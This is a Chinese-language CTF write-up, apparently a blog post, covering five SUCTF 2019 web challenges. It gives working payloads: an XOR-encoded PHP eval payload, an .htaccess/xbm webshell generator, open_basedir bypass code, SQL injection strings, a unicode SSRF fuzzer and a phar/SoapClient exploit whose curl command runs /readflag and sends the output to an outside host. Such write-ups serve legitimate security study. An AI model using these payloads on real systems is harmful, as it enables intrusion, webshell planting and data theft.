• 2019-SUCTF-web记录


    1.web1-chkin

    首先发现服务器中间件为nginx,并且fuzz上传过滤情况,是黑名单,带ph的全部不能上传切对文件内容中包含<?进行过滤,并且服务器对文件头有exif_type的判断,直接通过xbm格式绕过,传.htaccess和.user.ini是可以的,又因为此题为nginx,所以通过.user.ini结合文件夹中已经有的index.php使其包含上传的shell.png来getshell即可

    2.web2-easyphp

    做的时候思路也很明确,通过eval来调用get_the_flag函数,只需要异或出一个_GET即可,这里傻了刚开始一直以为异或得到字符串必须在url中通过'单引号或者双引号来包含着这些可以用的字符,因为这些字符有特殊含义,所以浏览器解码以后不能直接用,因为我fuzz异或字符时是以可打印字符为payload的,实际上这里要用到不可打印字符,这样浏览器即使解码也不会把其识别成有特殊含义的字符

    上面是异或出来的可见字符,当然这些字符大多数有特殊含义,在浏览器端不能直接使用,要用的话也要让单引号包含着,当作字符串,但是这里是没有单引号或者双引号的

    所有可打印字符的ascii码值为,只要是在这个范围内的字符,全部都会被浏览器解码为可见字符,因此可以在这个字符范围内进行异或字符的fuzz

    ['61', '62', '63', '64', '65', '66', '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f', '70', '71', '72', '73', '74', '75',
    '76', '77', '78', '79', '7a', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f', '50',
    '51', '52', '53', '54', '55', '56', '57', '58', '59', '5a']

    上图是fuzz出来的可以用的payload,可以看到可以用的payload,非常多,就拿第一个试试吧成功执行了phpinfo

    payload为:

    ${%80%80%80%80^%df%c7%c5%d4}{%80}();&%80=phpinfo

    fuzz异或的脚本如下所示:

    import string
    ee= string.printable
    a= map(lambda x:x.encode("hex"),list(ee))
    _=[] 
    G=[] 
    E=[]
    T=[] 
    print list(ee)
    for i in range(256):
        for j in range(256):
            if (chr(i) not in list(ee)) & (chr(j) not in list(ee)):
                tem = i^j
                if chr(tem)=="_":
                    temp=[]
                    temp.append(str(hex(i)[2:])+"^"+str(hex(j))[2:])
                    _.append(temp)
                if chr(tem)=="G":
                    temp=[]
                    temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                    G.append(temp)
                if chr(tem)=="E":
                    temp=[]
                    temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                    E.append(temp)
                if chr(tem)=="T":
                    temp=[]
                    temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                    T.append(temp)
    print _
    print G
    print E
    print T

    这里就可以执行get_the_flag函数了,就进入第二层

    第二层是

    function get_the_flag(){
        // webadmin will remove your upload file every 20 min!!!! 
        $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
        if(!file_exists($userdir)){
        mkdir($userdir);
        }
        if(!empty($_FILES["file"])){
            $tmp_name = $_FILES["file"]["tmp_name"];
            $name = $_FILES["file"]["name"];
            $extension = substr($name, strrpos($name,".")+1);
        if(preg_match("/ph/i",$extension)) die("^_^"); 
            if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
        if(!exif_imagetype($tmp_name)) die("^_^"); 
            $path= $userdir."/".$name;
            @move_uploaded_file($tmp_name, $path);
            print_r($path);
        }
    }

    第二层和第一个题基本相似,ph全过滤,

    但是可以上传.htaccess,因此可以使用

    #!/usr/bin/python3
    # Description : create and bypass file upload filter with .htaccess
    # Author : Thibaud Robin
    
    # Will prove the file is a legit xbitmap file and the size is 1337x1337
    #SIZE_HEADER = b"
    
    #define width 1337
    #define height 1337
    
    "
    
    def generate_php_file(filename, script):
        phpfile = open(filename, 'wb') 
        phpfile.write(SIZE_HEADER)
        phpfile.write(script.encode('utf-16be'))
        
    
        phpfile.close()
    
    def generate_htacess():
        htaccess = open('.htaccess', 'wb')
        htaccess.write(SIZE_HEADER)
        htaccess.write(b'AddType application/x-httpd-php .ppp
    ')
        htaccess.write(b'php_value zend.multibyte 1
    ')
        htaccess.write(b'php_value zend.detect_unicode 1
    ')
        htaccess.write(b'php_value display_errors 1
    ')
    
        htaccess.close()
            
    generate_htacess()
    
    generate_php_file("webshell.ppp", "<?php eval($_GET['cmd']); die(); ?>")

     拿到shell以后,这道题还有三种做法:

    1.openbase_dir的限制,因此还要先绕过openbase_dir,

    这里因为出题人disable_function的过滤不严,也可以通过

    chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));

    来进行bypass列目录,然后再跳一次进行读取flag即可

    2.直接通过绕过disable_dunction来进行绕过openbase_dir,这里出题人没过率好

    3.预期解是通过攻击php-fpm的unix套接字来进行绕过openbase_dir和绕过disable_function,因为php-fpm通常就两种运行模式,fast-cgi和unix套接字模式运行,所以这里可以直接用p神的脚本,更改一下php_value的值即可

     

    需要将这个默认文件改为unix套接字的路径

    php7.2-fpm.sock默认在,unix:///run/php/php7.2-fpm.sock

    但是0ctf中也出现过在其他目录,如/var/run/php/下,

    'PHP_VALUE': 'auto_prepend_file = php://input'+chr(0x0A)+'open_basedir = /',

    3.easy_sql

    这道题拿上我就直接尝试的是短路型注入方式,length(database())={},根据返回1或者0来判断逻辑,但是后面就遇到问题了,可以跑出来库名为CTF,要跑表

    但是限制了payload长度,因此没法继续注入去拿表名,并且from也是过滤了,还想过是不是可以直接猜测字段名通过substr(flag,1,1)这种来拿到flag,但是flag关键词也被过滤了,猜测了几个其它的字段也没用

    这里也尝试过load_file,load_file('/flag')来尝试,但是也没反应,后面堆叠是可以查表查字段的,但是flag过滤了,prepare限制了sql语句的长度,也凉凉

    这里把Flag字符串直接进行过滤了,强网杯也出过这种题,尝试预编译:

    payload还没输完就报长度限制了,因此这种方法也不行

    这里有队伍扫出源码了,.index.php.swp,我用dirsearch没扫到,得换个工具再扫一次。。

    过滤关键词在这里

    $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|fr om|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|"";  

    查询语句如上图所示,可以看到是支持堆叠查询的,感觉预期解应该是堆叠注入,然而并不是,是一个新的知识点

     预期解为:

    1;set sql_mode=pipes_as_concat;select 1

    即将||或逻辑转为字符串连接,那么将会把任意传递的query内容和flag进行拼接返回

    这题没有过滤*,导致非预期很严重,*,1直接可以出flag。,如果过滤好的话,这道题估计还是得猜逻辑

    和字符串或时前面为1则返回1,前面为0则返回0,变为pipes_as_concat以后||就成了连接符了,还是一个比较新的点。

     4.pytohnginx

    看到题目第一眼立马想到blackhat2019刚出来的这个unicode编码的洞

    这里之前不了解python的urllib.request.urlopen的截断,这里不存在的目录的话会直接截断导致没法读取文件,我刚开始选择是

    那么转化以后c/o,o这个文件夹肯定是不存在的,因此没法读取,urlopen打开文件夹进行目录穿越时必须是存在的目录

     比如上面这个app目录是存在的,题目的nginx配置文件如下图所示

    这里有以下几种解法:

    1.直接通过转换一个像c的字符,来进行读文件,delta的exp就是利用unicode字符范围来尝试出可以使用的字符串

    from urllib.parse import urlparse,urlunsplit,urlsplit
    from urllib import parse
    def get_unicode():
        for x in range(65536):
            uni=chr(x)
            url="http://suctf.c{}".format(uni)
            try:
                if getUrl(url):
                    print("str: "+uni+' unicode: \u'+str(hex(x))[2:])
            except:
                pass
    def getUrl(url):
        url = url
        host = parse.urlparse(url).hostname
        if host == 'suctf.cc':
            return False
        parts = list(urlsplit(url))
        host = parts[1]
        if host == 'suctf.cc':
            return False
        newhost = []
        for h in host.split('.'):
            newhost.append(h.encode('idna').decode('utf-8'))
        parts[1] = '.'.join(newhost)
        finalUrl = urlunsplit(parts).split(' ')[0]
        host = parse.urlparse(finalUrl).hostname
        if host == 'suctf.cc':
            return True
        else:
            return False
    
    if __name__=="__main__":
        get_unicode()

    随便选其中一个就可以,然后访问:

    可以看到此时达成的效果是相同的

    2.第二种就是多转为一个/,利用file://suctf.cc/usr/local/nginx/conf/nginx.conf先读nginx的配置文件,然后可以看到flag的位置在/usr/fffffflag,然后再读flag即可,这里不要移位nginx的配置文

    件只是为/etc/nginx/nginx.conf,刚开始我不知道urlopen不存在的目录会截断==

    3.利用file:////suctf.cc/etc/passwd来绕过,那么urlparse解析的时候将无法取到hostname

    然后第二步将url分割,分割出来还是空,因此前两个if判断很容易bypass

    经过第三步,此时finalurl和host都是满足条件的,主要是还是因为前面urlspilt时去掉了中间的两个//

    然后进行任意文件读取即可,这个也是非预期,感觉比较有意思

    5.uoload labs

    这道题开了一会给源码了

    其中index.php,限定了后缀,并且返回上传路径,对上传文件内容检测<?

    func.php中,会对我们提交的文件地址进行访问

    并调用getMIME函数进行文件内容检测,这里实际上猜也能猜到肯定这里存在phar反序列化,因为后面的admin.php限定了访问的ip地址

    因此这里自然想到考了很多次的SoapClient反序列化,那么恰好这个File类又存在__wakeup函数

    因此在反序列化时将会通过反射类机制实现类的实例化,并且调用类对象的check的函数,这里我们可以通过$this->func=“SoapClient”,$this->file_name为new SoapClient(null,payload)中的payload传入即可,并且调用不存在的check函数,从而发起soap请求,那么现在外层的思路已经清晰了,通过phar反序列化触发soap请求,那么这里读取文件的时候又进行了限制:

     

    这里过滤了很多协议,phar://,conpress.bzip2,conpress.zlib都过滤了

    因此可以用:

    php://filter/resource=phar://

    来绕过过滤,从而来触发phar反序列化,那么序列化链条已经好了,现在要构造内部数据,先贴一个exp(针对buu平台复现的,有所修改):

    <?php
    system('rm -f 222.phar;rm -f *.gif');
    $phar = new Phar('333.phar');
    $phar->startBuffering();
    $phar->addFromString('333.txt','text');
    $phar->setStub('<script language="php">__HALT_COMPILER();</script>');
    
    class File {
        public $file_name = "";
        public $func = "SoapClient";
    
        function __construct(){
            $target = "http://127.0.0.1/admin.php";
            $post_string = 'admin=1&cmd=curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"&clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3='. "
    ";
            $headers = [];
            $this->file_name  = [
                null,
                array('location' => $target,
                      'user_agent'=> str_replace('^^', "
    ", 'xxxxx^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string),
                      'uri'=>'hello')
            ];
        }
    }
    $object = new File;
    echo urlencode(serialize($object));
    $phar->setMetadata($object);
    $phar->stopBuffering();
    system('mv 222.phar 222.gif');

     首先soap的内部数据,主要是访问admin.php时需要post过去的数据

    这里调用将传递到admin.php的参数进行实例化了AD类,在这个类中,又通过反射类来实例一个对象,并通过该实例化的对象来调用反射出来的该类的方法,因此只要满足传递过去的clazz类存在并且传给该类的函数的参数可以为一个就行,这里可以直接用splstack类,就是php语言实现的一个栈数据类型的类,我们只需要随便调用其中一个方法即可,比如push方法,将数据压入栈中。

    clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3=

    即这一个部分就可以构造好了,在用buuoj的平台测试的时候要注意cmd参数要适当转义

    curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"

    这里一个部分要将&换为%26,防止命令行下将&识别为命令链接符号,比如ls & id,将执行两条命令,这里还要注意题目中对要读取的文件内容进行了一个过滤<?,那么在phar的stub中,也就是标志phar包的标志中:

    $phar->setStub("GIF89aphp __HALT_COMPILER(); ?>"); //设置stub

    所以只需要保证后面的一部分结尾正确即可。

    或者可以使用前面题目中的<script language="php">来绕过

    接下来直接生成exp进行测试即可,又可以收到flag了

    然而这个不是预期解,预期解是:

    $m = new mysqli();
    $m->init();
    $m->real_connect('ip','数据库账号','数据库密码','数据库',3306);
    $m->query('select 1;')//执行的sql语句

    实际上是与下图的check函数是对应起来的

    这样结合在vps搭建一个rouge mysql服务器就能够对客户端文件进行读取了,那么没设计好的是__destruct函数,这个析构函数在程序执行结束后也会执行一次,zedd师傅在后面也改成了__wakeup函数

     正常情况下不执行__wakeup()

     只有反序列化的时候会执行__wakeup(),然后执行__destruct(),然后程序运行结束销毁对象,在执行一次__destruct函数

    关于mysql 客户端攻击链接:

    https://paper.seebug.org/998/

  • 相关阅读:
    mybatis
    Spring原理
    JS 之继承
    HTTP协议简介2
    JS 之原型,实例,构造函数之间的关系
    HTTP协议简介1
    freemarker语法简介
    CSS 动画之十-图片+图片信息展示
    JS实现颜色值的转换
    抓包工具charles的使用
  • 原文地址:https://www.cnblogs.com/tr1ple/p/11373037.html
Copyright © 2020-2023  润新知